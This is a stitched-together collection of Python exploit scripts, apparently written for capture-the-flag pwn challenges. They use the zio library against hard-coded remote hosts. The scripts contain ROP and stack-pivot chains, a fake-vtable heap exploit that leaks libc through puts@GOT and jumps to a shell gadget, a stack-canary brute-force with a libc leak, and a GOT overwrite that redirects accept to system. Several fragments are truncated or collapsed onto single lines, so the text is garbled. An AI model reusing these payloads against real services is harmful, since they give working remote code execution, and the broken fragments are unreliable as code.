pivot = 0x804867D

# Stage-1 chain after 108 bytes of NUL padding (annotations from the original):
#   read_80_bytes  - read the next stage into memory
#   gadget1        - pop pop ret
#   buf            - read again
#   buf            - ebp <- buf
#   pivot          - mov esp, ebp
#   0xdeadbeef     - placeholder
chain = [
    read_80_bytes,
    gadget1,
    buf,
    buf,
    pivot,
    0xdeadbeef,
]
payload = '\x00' * 108 + ''.join(l32(v) for v in chain)
# fd = open("/home/rsbo/flag", 0);
#payload += l32(open_plt) + l32(flag) + l32(0)
from zio import *

# Three NUL-separated fields, a newline, then a trailing token -- sent in one write.
payload = "1111\x002222\x003333\n123123"

io = zio("./main", timeout = 9999)
io.write(payload)
io.interact()
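#!/usr/bin/env python2.7
#encoding:utf-8
from zio import *
import time

# The original first set a local target ('127.0.0.1', 9979) and then
# overwrote it with the remote one.
target = ('120.55.113.21',4799)

# Replies the service expects for its "sum" challenges.  They are not plain
# arithmetic (e.g. '1*2+3' -> 10), so they are looked up, not computed.
smps = {'1*2+3':10,'4-3+7':2,'9*3-5':4,'6+7*8':166,'15+3*8-7':255,'3*8+11+4':316}


def _question(line):
    """Return the expression part of a challenge line: the text before ' sum'.

    Raises ValueError when the marker is missing.  The original sliced
    ``line[:-2]`` in that case (``find`` returned -1) and only failed later
    on the dictionary lookup, hiding which line was unexpected.
    """
    cut = line.find('sum')
    if cut < 0:
        raise ValueError('unexpected challenge line: %r' % line)
    return line[:cut - 1].strip()


io = zio(target,timeout=5,print_read=COLORED(REPR,'cyan'),print_write=COLORED(REPR,'red'))
io.writeline('thatsme')
io.writeline()
time.sleep(0.5)
io.writeline('31')
io.read_until('吧')
io.readline()
# Three challenges arrive back to back; each is answered from the table.
# An unknown expression raises KeyError, as before.
for _ in range(3):
    q = _question(io.readline())
    io.writeline(str(smps[q]))
io.writeline()
time.sleep(0.5)
io.read_until(':)')
io.readline()
io.readline()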
def get_io(target):
    """Return a zio session to ``target`` with a 9999-second timeout."""
    return zio(target, timeout = 9999)
def get_io(target):
    """Open a quiet zio session to ``target``: 5 s timeout, no traffic echo.

    To watch the exchange, replace the two ``False`` values with e.g.
    ``COLORED(RAW, "green")`` for reads and ``COLORED(RAW, "blue")`` for writes.
    """
    echo = dict(print_read=False, print_write=False)
    return zio(target, timeout=5, **echo)
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from zio import *

# Remote endpoint; traffic is echoed in REPR form (reads yellow, writes blue).
target = ('10.211.55.56', 12345)
echo = dict(print_read=COLORED(REPR, 'yellow'), print_write=COLORED(REPR, 'blue'))
io = zio(target, timeout=10000, **echo)
# Sync on the first prompt before anything is sent.
io.read_until('Send block 0\n')
# encoding:utf-8 # 32位无NX, 覆盖BSS段函数指针 from zio import * from pwn import * func = 0x804A160 bss_data = 0x804A060 context(arch='i386', os='linux', log_level='debug') io = zio(('101.200.187.112',9004),timeout = 9999, #io = zio('./pwn1', timeout = 9999, print_read = COLORED(RAW, 'green'), print_write = COLORED(RAW,'blue')) io.read_until(':') #io.gdb_hint(breakpoints= [0x08048600]) ''' Disassembly of section .text: 08048060 <_start>: 8048060: 31 c0 xor %eax,%eax 8048062: 50 push %eax 8048063: 68 2f 2f 73 68 push $0x68732f2f 8048068: 68 2f 62 69 6e push $0x6e69622f 804806d: 89 e3 mov %esp,%ebx 804806f: 89 c1 mov %eax,%ecx
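def exploit(host):
    """Turn the TV/Movie catalogue service at ``host`` into a shell.

    What the code does, step by step:
      * ``write_TV_Vtable`` grooms the heap (five TV adds, four removes, one
        padding Movie) so that a Movie's ``actors`` string is allocated where
        a TV object's vtable used to live; the string is a fake 0x60-byte
        vtable ending in ``;/bin/sh;``.
      * ``read_any_where_once`` points that vtable at ``printMovieInfo`` and
        adds a TV whose intro carries a chosen address, so ``show_all`` prints
        8 bytes from it.  It is used once, on puts@GOT; libc is then rebased
        with hard-coded offsets (0x6FE30 / 0x46640 / 0x4652C) that belong to
        the remote libc.
      * A second fake vtable whose three slots all hold ``shot_shell`` is
        installed, ``show_all`` triggers it, and the session is handed over.

    Changes from the original: a bare ``except:`` with ``exit(0)`` became
    ``except Exception`` with exit status 1 (a failed connect must not look
    like success) and the message typo was fixed; the ``leak_heap`` /
    ``leak_libc`` stubs, which returned names that do not exist, are gone;
    input-length ``assert``s are plain checks that survive ``python -O``;
    a couple of unused locals were dropped.  The heap-grooming sequence is
    untouched.
    """
    try:
        io = zio(host, timeout=1000, print_read=False, print_write=False)
        if not io:
            raise Exception("zio returned no session")
    except Exception:
        print("can't connect server!")
        raise SystemExit(1)

    def add_TV(name, Season, Rating, intro):
        # Length limits from the original assert (presumably the service's
        # buffer sizes).
        if not (len(name) < 64 and len(Season) < 16 and len(Rating) < 16 and len(intro) < 128):
            raise ValueError("add_TV: field too long")
        io.read_until("Your choice?")
        io.writeline("1")
        io.writeline(name)
        io.writeline(Season)
        io.writeline(Rating)
        io.writeline(intro)

    def add_Movie(name, Actors, Rating, intro):
        # Only name/intro are bounded, as in the original; Actors must stay
        # unbounded because write_TV_Vtable passes a 0xE0-byte string.
        if not (len(name) < 64 and len(intro) < 128):
            raise ValueError("add_Movie: field too long")
        io.read_until("Your choice?")
        io.writeline("2")
        io.writeline(name)
        io.writeline(Actors)
        io.writeline(Rating)
        io.writeline(intro)

    def remove_obj(name):
        # Menu 3: delete an entry by name.
        io.read_until("Your choice?")
        io.writeline("3")
        io.writeline(str(name))

    def show_all():
        # Menu 4: list everything -- this is what dispatches through the vtables.
        io.read_until("Your choice?")
        io.writeline("4")

    def write_TV_Vtable(vtable, mark=";/bin/sh;"):
        """Lay a fake vtable over a freed TV object and return that TV's name."""
        vtable_size = 0x60
        blob = "".join(l64(fn) for fn in vtable)
        blob += "@" * (vtable_size - len(blob) - len(mark)) + mark
        if len(blob) != vtable_size:
            raise ValueError("vtable blob is %d bytes, expected 0x%x" % (len(blob), vtable_size))
        # chr(0x71): the name the clobbered TV shows up under.  0x60 + 0x10 + 1
        # looks like a chunk size word (size | PREV_INUSE) being read back as
        # text -- TODO confirm against the binary.
        tv_name = chr(vtable_size + 0x10 + 1)
        # Heap grooming.  The order and the duplicate "33333333" (only one of
        # the two is removed) are intentional; do not tidy this sequence.
        add_TV("00000000", "0", "0", "0" * 0x7F)
        add_TV("11111111", "0", "0", "0" * 0x7F)
        add_TV("22222222", "0", "0", "0" * 0x7F)
        add_TV("33333333", "0", "0", "0" * 0x7F)
        add_TV("33333333", "0", "0", "0" * 0x7F)
        remove_obj("22222222")
        remove_obj("11111111")
        remove_obj("00000000")
        remove_obj("33333333")
        add_Movie("padding", "0" * 0xE0, "1", "0" * 0x7F)
        # do not remove 'overwriting': its actors string is the live fake vtable
        add_Movie("overwriting", blob, "1", "1" * 0x7F)
        return tv_name

    def read_any_where_once(where):
        """Leak the 8 bytes at ``where`` through printMovieInfo on a fake-vtable TV."""
        p_nullstub = 0x0004012A0
        p_printMovieInfo = 0x004011B0
        tv_vtable = [p_printMovieInfo, p_nullstub, p_nullstub]
        tv_name = write_TV_Vtable(vtable=tv_vtable)
        # intro = 8 filler bytes + the target address; presumably
        # printMovieInfo treats the second word as the "actors" pointer.
        floatnum = 0x0101010101010101
        add_TV("leak_libc", "0", "0", l64(floatnum) + l64(where))
        # trigger: tv_name is listed as a Movie and calls p_printMovieInfo
        show_all()
        io.read_until("Movie <{0}>: ".format(tv_name))
        io.read_until("actors: ")
        leaked = io.readline().strip()
        # Printed as a C string, so it stops at the first NUL; pad back to 8 bytes.
        return l64(leaked.ljust(8, "\x00")[0:8])

    # leak info
    got_puts = 0x601C40
    puts = read_any_where_once(got_puts)
    print("[+] puts\t=>\t{0}".format(hex(puts)))
    libc_base = puts - 0x6FE30
    print("[+] libc_base\t=>\t{0}".format(hex(libc_base)))
    system = libc_base + 0x46640
    print("[+] system\t=>\t{0}".format(hex(system)))
    shot_shell = libc_base + 0x004652C
    print("[+] shot_shell\t=>\t{0}".format(hex(shot_shell)))

    # fake vtable: every slot is shot_shell (presumably a one-gadget), so
    # whichever entry show_all dispatches through ends up there
    tv_vtable = [shot_shell, shot_shell, shot_shell]
    tv_name = write_TV_Vtable(tv_vtable)
    # trigger that tv_name will call shot_shell
    # remove_obj(tv_name)
    show_all()
    print("[+] shell open ")
    io.writeline("id")
    io.interact()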
buf = 0x804a058 pppr = 0x8048c0d ppr = pppr + 1 pr = ppr + 1 recv_line = 0x8048744 send_len = 0x80487cc send_str = 0x8048848 accept_plt = 0x80485c0 accept_got = 0x804a01c accept_addr = 0xf0200 system_addr = 0x3ee80 system_accept_diff = system_addr - accept_addr io = zio(target, print_write=False, print_read=COLORED(REPR, 'red'), timeout=9999999) payload = 'A' * 268 rop_chain = [ # system() buf, 0x44444444, accept_plt, # recv_line(), overwrite accept got accept_got, pr, recv_line, # sendlen(), get the got of accept 4,
#leak canary, rbp, ret_address for x in range(3): byte_by_byte() log("----------result----------", 'blue') log("canary: " + hex(canary_value), 'red') log("save_rbp: " + hex(save_rbp), 'red') log("ret_address: " + hex(ret_address), 'red') #get libc_addr log("----------get libc_addr----------", 'blue') base_addr = ret_address - 0xe15 log("base_addr: " + hex(base_addr), 'red') dprintf_got = 0x202040 log("dprintf_got: " + hex(dprintf_got), 'red') fd = 0x4 io = zio((ip, 1234), timeout = 100000, print_read = REPR, print_write = COLORED(REPR)) payload = "A"*8200 + l64(canary_value) + l64(save_rbp) + l64(base_addr+0xec6) + "A"*8 + l64(0x0) +\ "A"*8 + l64(base_addr+dprintf_got) + "A"*8 + l64(base_addr+dprintf_got) + l64(fd) +\ l64(base_addr+0xeb0) io.write(payload) io.read_until('thanks.\n') dprintf_addr = l64(io.readline().ljust(8, '\x00')) log("dprintf_addr: " + hex(dprintf_addr), 'red') # # local # dprintf_offset = 0x4E640 # system_offset = 0x3FF80 # binsh_offset = 0x14C28D #server